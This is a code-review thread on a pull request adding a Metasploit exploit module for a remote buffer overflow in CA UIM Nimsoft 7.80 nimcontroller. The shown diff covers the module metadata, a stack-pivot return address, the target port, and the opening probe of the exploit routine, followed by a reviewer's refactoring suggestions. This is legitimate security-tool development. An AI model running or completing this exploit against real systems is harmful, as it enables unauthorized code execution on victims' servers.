modules/exploits/windows/nimsoft/nimcontroller_bof.rb

```diff
@@ -0,0 +1,460 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a buffer overflow within the CA Unified Infrastructure Management nimcontroller.
+        The vulnerability occurs in the robot (controller) component when sending a specially crafted directory_list
+        probe.
+
+        Technically speaking the target host must also be vulnerable to CVE-2020-8010 in order to reach the
+        directory_list probe.
+
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'wetw0rk' # Vulnerability Discovery and Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2020-8010' ], # CA UIM Probe Improper ACL Handling RCE (Multiple Attack Vectors)
+          [ 'CVE', '2020-8012' ], # CA UIM nimbuscontroller Buffer Overflow RCE
+          [ 'URL', 'https://support.broadcom.com/external/content/release-announcements/CA20200205-01-Security-Notice-for-CA-Unified-Infrastructure-Management/7832' ],
+          [ 'PACKETSTORM', '156577' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC'      => 'process',
+          'AUTORUNSCRIPT' => 'post/windows/manage/migrate'
+        },
+      'Payload'        =>
+        {
+          'Space'         => 9000,
+        },
+      'Platform'       => 'win',
+      'Arch'           => ARCH_X64,
+      'Targets'        =>
+        [
+          [
+            'Windows Universal (x64) - v7.80.3132',
+            {
+              'Platform' => 'win',
+              'Arch'     => [ARCH_X64],
+              'Version'  => "7.80 [Build 7.80.3132, Jun  1 2015]",
+              'Ret'      => 0x000000014006fd3d # pop rsp; or al, 0x00; add rsp, 0x0000000000000448 ; ret [controller.exe]
+            }
+          ],
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Feb 05 2020',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(48000),
+      ])
+
+  end
+
+  def exploit
+
+    connect
+
+    print_status("Verifying directory_list probe is accessible")
+    sock.put(generate_probe("directory_list", ["directory=C:\\", "detail=1"]))
+    check = parse_listing(sock.get_once(4096), "C:\\")
+    if check == 0
+      print_good("Successfully obtained directory listing, continuing exploitation")
+    else
+      return Exploit::CheckCode::Safe
+    end
```

Comment:
Remove unnecessary `check` variable and prefer `fail_with` over `return` (when executing in `exploit` method).

```suggestion
    unless parse_listing(sock.get_once(4096), "C:\\") == 0
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end

    print_good("Successfully obtained directory listing, continuing exploitation")
```

Also, is there a reason to use a custom check here? Can the existing code in the `check` method be used instead? The `AutoCheck` mixin can take care of this automatically. All you would need to do is add `prepend Msf::Exploit::Remote::AutoCheck` at the start of the module (before the `include` lines) and you'll get automagic checking for free. If the operator wants to bypass the AutoCheck and proceed with exploitation even when the check fails, they can `set ForceExploit true`.